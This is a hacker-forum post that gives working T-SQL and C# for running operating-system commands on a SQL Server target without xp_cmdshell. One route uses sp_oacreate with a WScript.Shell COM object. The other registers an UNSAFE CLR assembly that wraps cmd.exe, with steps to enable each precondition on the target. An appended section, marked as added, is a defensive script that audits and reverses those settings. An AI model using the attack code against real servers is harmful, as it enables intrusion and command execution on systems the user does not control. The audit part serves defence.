Executing commands in SQL Server without xp_cmdshell

Posted by 黑客倉庫站長 (hackersec verified member, administrator)

Executing commands via COM

(Requires the Ole Automation Procedures component to be enabled)

```sql
declare @luan int, @exec int, @text int, @str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}', @luan output;
exec sp_oamethod @luan, 'exec', @exec output, 'C:\\Windows\\System32\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out;
select @str;
```



[Image: sql server没xpcmdshell执行命令-1.png]




If Ole Automation Procedures is not enabled, it can be turned on with the following commands:

```sql
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
```

Language: C#
Create a class library in Visual Studio

```csharp
using System;
using System.Diagnostics;

namespace shellexec
{
    public class exec
    {
        public static string cmd(string command)
        {
            Process pro = new Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;
            pro.StartInfo.RedirectStandardError = true;   // standard error
            pro.StartInfo.RedirectStandardInput = true;   // standard input
            pro.StartInfo.RedirectStandardOutput = true;  // standard output
            pro.StartInfo.CreateNoWindow = true;          // do not open the process in a new window
            pro.Start();
            pro.StandardInput.WriteLine(command + "&&exit"); // write the command and its arguments
            pro.StandardInput.AutoFlush = true;              // flush the buffer automatically
            string output = pro.StandardOutput.ReadToEnd();  // read the execution result
            pro.WaitForExit();                                // wait for the process to finish and exit
            pro.Close();
            return output;
        }
    }
}
```


After the DLL is built, it can be written to the target as hex or uploaded through a shell. Then build the following.

1. The target database instance needs CLR integration enabled

```sql
exec sp_configure 'clr enabled', 1; -- enable CLR in SQL Server
reconfigure;
go
```

2. The target database's TRUSTWORTHY property needs to be turned on; it can be enabled with the following statement

```sql
ALTER DATABASE [<database name>] SET TRUSTWORTHY ON
```

3. Register the DLL in the database

```sql
CREATE ASSEMBLY MySqlCLR FROM '<path to dll>' -- MySqlCLR is the name the assembly gets after import
```

4. Create the function
(Build the parameter list to match the parameter types of the corresponding .NET method; if the method returns a string, remember to declare RETURNS [nvarchar](max) so the full result is returned. Then point EXTERNAL NAME at the assembly name followed by the namespace, class and method.)

```sql
CREATE FUNCTION [dbo].[cmd2]
(
    @cmd AS NVARCHAR(max)
)
RETURNS [nvarchar](max) WITH EXECUTE AS CALLER
AS
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd -- shellexec is the namespace, exec the class, cmd the method
GO
```

5. The assembly's permission level must be set to external access, otherwise deployment will fail with an error

```sql
ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE
```

6. Call the stored procedure or function

```sql
select [dbo].[cmd2]('whoami')
```
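Both routes described on this page, the COM route through sp_oacreate and the CLR route through a registered assembly, depend on a small set of server and database settings that an administrator can enumerate. The following audit and hardening script is an added example written for this page; it is not part of the original post. It reads the SQL Server catalog views (sys.configurations, sys.databases, sys.assemblies, sys.assembly_modules) to show whether an instance has the preconditions the post relies on, then lists the settings to reverse. The database name in the remediation section is a placeholder; the 'clr strict security' option exists only on SQL Server 2017 and later.

```sql
-- Added audit example (not from the original post): find the preconditions
-- for sp_oacreate- and CLR-based command execution on this instance.

-- 1. Server-level options. Outside a documented need, every one of these
--    should read 0; 'show advanced options' = 1 is itself a hint that
--    someone has been changing them.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('Ole Automation Procedures',
               'clr enabled',
               'clr strict security',
               'xp_cmdshell',
               'show advanced options');

-- 2. Databases marked TRUSTWORTHY. This is what lets an unsigned
--    EXTERNAL_ACCESS/UNSAFE assembly load; normally only msdb is listed.
SELECT name,
       SUSER_SNAME(owner_sid) AS owner_name
FROM sys.databases
WHERE is_trustworthy_on = 1;

-- 3. User-defined assemblies in the current database that run with an
--    elevated permission set (run in each database of interest).
SELECT a.name                    AS assembly_name,
       a.permission_set_desc,
       USER_NAME(a.principal_id) AS owner_name,
       a.create_date,
       a.modify_date
FROM sys.assemblies AS a
WHERE a.is_user_defined = 1
  AND a.permission_set_desc IN ('EXTERNAL_ACCESS', 'UNSAFE');

-- 4. CLR functions and procedures bound to user assemblies, with the
--    namespace.class and method they call (the post's cmd2 would show
--    here as shellexec.exec / cmd).
SELECT OBJECT_SCHEMA_NAME(m.object_id) AS schema_name,
       OBJECT_NAME(m.object_id)        AS object_name,
       a.name                          AS assembly_name,
       m.assembly_class,
       m.assembly_method
FROM sys.assembly_modules AS m
JOIN sys.assemblies AS a ON a.assembly_id = m.assembly_id
WHERE a.is_user_defined = 1;

-- 5. Remediation, after confirming nothing legitimate depends on the
--    settings. Placeholder database name; replace before running.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
-- SQL Server 2017+: treat every assembly as UNSAFE and require it to be
-- signed with a trusted certificate/key before it can load.
EXEC sp_configure 'clr strict security', 1;
RECONFIGURE;
ALTER DATABASE [<database name>] SET TRUSTWORTHY OFF;
```

The configuration queries are read-only and safe to schedule; the remediation statements change server behaviour and belong in a change window. Queries 3 and 4 are per-database, so they need to be run in (or wrapped with sp_MSforeachdb over) each database, not just the one you are connected to.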



[Image: sql server没xpcmdshell执行命令-2.png]






[Image: sql server没xpcmdshell执行命令-3.png]



References:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true